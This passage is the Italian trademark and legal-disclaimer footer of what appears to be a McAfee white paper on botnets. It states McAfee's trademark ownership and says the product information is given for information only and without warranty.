o marchi di McAfee, Inc. o sue filiali negli Stati Uniti e altre nazioni. Gli altri marchi e le altre marche possono essere di proprietà di terzi. I piani, le specifiche e le descrizioni dei prodotti sono qui forniti a puro scopo informativo e sono soggetti a variazioni senza preavviso, e vengono forniti senza alcun tipo di garanzia, esplicita o implicita. 10204wp_botnets_0710_ETMG